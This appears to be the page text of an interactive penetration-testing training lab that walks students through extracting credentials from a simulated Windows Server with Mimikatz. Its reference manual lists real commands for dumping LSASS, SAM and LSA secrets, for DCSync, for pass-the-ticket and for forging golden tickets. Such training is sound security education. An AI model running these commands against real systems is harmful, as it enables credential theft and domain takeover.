/l、 (゚、 。 7  l ~ヽ  じしf_,)ノ
MIMIKATZ
CYBERSEC LAB — VIRTUAL PENETRATION TESTING
MODULE 12 — CREDENTIAL EXTRACTION FROM MEMORY
Loading mimikatz 2.2.0 (x64) #19041...

🐱 ASSIGNMENT GOALS

Launch Mimikatz and enable SeDebugPrivilege.
Run sekurlsa::logonpasswords to extract credentials from LSASS.
Run lsadump::sam to dump the SAM database hashes.
Run lsadump::secrets to extract LSA secrets.
Run kerberos::list to enumerate Kerberos tickets.
Complete the pentest report and submit.
PHASE 1 — SETUP & PRIVILEGE
💻
Terminal
📖
Reference Manual
📝
Notepad
📋
Pentest Report
⊞ START
Terminal
Reference
Notepad
Report
00:00:00
📋 BRIEFING
⚠ CLASSIFIED — RED TEAM OPERATION

MISSION BRIEFING

Operation: Cat Burglar  |  Tool: Mimikatz 2.2.0
SCENARIO
You have SYSTEM-level access to an Apex Systems Windows Server 2019 machine (APEX-SRV-02) obtained during the previous engagement phase.

Your objective is to use Mimikatz to extract credentials directly from Windows memory — cleartext passwords, NTLM hashes, and Kerberos tickets stored in the LSASS process.

These credentials can be used for lateral movement across the domain, Pass-the-Hash attacks, and Kerberoasting. Document all findings in the pentest report.
OBJECTIVES
1
Launch mimikatz.exe and run privilege::debug to enable SeDebugPrivilege.
2
Run sekurlsa::logonpasswords — extract NTLM hashes and cleartext passwords from LSASS memory.
3
Run lsadump::sam — dump the SAM database of local account hashes.
4
Run lsadump::secrets — extract LSA secrets including service account credentials.
5
Run kerberos::list — enumerate Kerberos tickets stored in memory.
6
Fill out the Pentest Report and submit.
TOOLS
💻
Terminal (Windows CMD)
mimikatz.exe — already on target at C:\Tools\mimikatz.exe
📖
Reference Manual
Mimikatz module reference, credential types, attack paths
📋
Pentest Report
Document and submit your credential extraction findings
TARGET
🖥️
APEX-SRV-02
192.168.1.100 — Windows Server 2019 — Running as SYSTEM
Display Mode
C:\WINDOWS\SYSTEM32\CMD.EXE — APEX-SRV-02
Microsoft Windows [Version 10.0.17763.5576]
(c) 2018 Microsoft Corporation. All rights reserved.
 
Current user: NT AUTHORITY\SYSTEM
Mimikatz is available at: C:\Tools\mimikatz.exe
Type 'help' for available commands.
 
C:\Tools>
REFERENCE MANUAL — MIMIKATZ
WHAT IS MIMIKATZ?
Mimikatz is a post-exploitation tool that extracts credentials from Windows memory. It reads directly from the LSASS (Local Security Authority Subsystem Service) process, which stores authentication data for all logged-on users.
LAUNCH & PRIVILEGE
mimikatz.exe — launch mimikatz
mimikatz — (if in PATH)

privilege::debug — enable SeDebugPrivilege
REQUIRED before any extraction
token::elevate — impersonate SYSTEM token
CREDENTIAL EXTRACTION (sekurlsa)
sekurlsa::logonpasswords — dump ALL credentials
from LSASS (main command)
sekurlsa::wdigest — WDigest cleartext only
sekurlsa::msv — NTLM hashes only
sekurlsa::kerberos — Kerberos credentials
sekurlsa::tspkg — TS/PKG credentials
sekurlsa::livessp — LiveSSP credentials
SAM & LSA DUMPING (lsadump)
lsadump::sam — dump SAM database
(local account hashes)
lsadump::secrets — dump LSA secrets
(svc accounts, cached)
lsadump::cache — cached domain logons
lsadump::dcsync /user:Administrator
— DCSync attack (DA needed)
KERBEROS ATTACKS
kerberos::list — list tickets in memory
kerberos::list /export — export .kirbi files
kerberos::ptt ticket.kirbi — Pass-the-Ticket
kerberos::golden — create golden ticket
/user:Administrator
/domain:APEXCORP.LOCAL
/sid:S-1-5-21-...
/krbtgt:[NTLM hash]
/ticket:golden.kirbi
CREDENTIAL TYPES EXPLAINED
TYPEDESCRIPTIONUSE CASE
NTLM HashHashed Windows passwordPass-the-Hash, cracking
CleartextPlaintext password in memoryDirect login, reuse
Kerberos TGTTicket Granting TicketPass-the-Ticket
LSA SecretService/scheduled task credsLateral movement
Cached CredsDomain creds cached locallyOffline cracking
EXPORT & MISC
log output.txt — log all output to file
exit — quit mimikatz
version — show mimikatz version
cls — clear screen
WHY PRIVILEGE::DEBUG?
SeDebugPrivilege allows a process to read/write memory of any other process, including LSASS. Without it, Mimikatz cannot access LSASS memory. This privilege is only available to Administrators and SYSTEM accounts.
NOTEPAD — notes.txt
FileEditFormatView
Ln 1, Col 1UTF-8notes.txt
PENTEST REPORT — MIMIKATZ FINDINGS

CREDENTIAL EXTRACTION FINDINGS REPORT

APEX SYSTEMS INC. — RED TEAM ENGAGEMENT — COMPLETE ALL FIELDS

SECTION 1 — EXTRACTION METHOD
SECTION 2 — CLEARTEXT CREDENTIALS
SECTION 3 — HASH EXTRACTION
SECTION 4 — ATTACK PATHS IDENTIFIED
SECTION 5 — RISK & REMEDIATION
Score: 0 / 10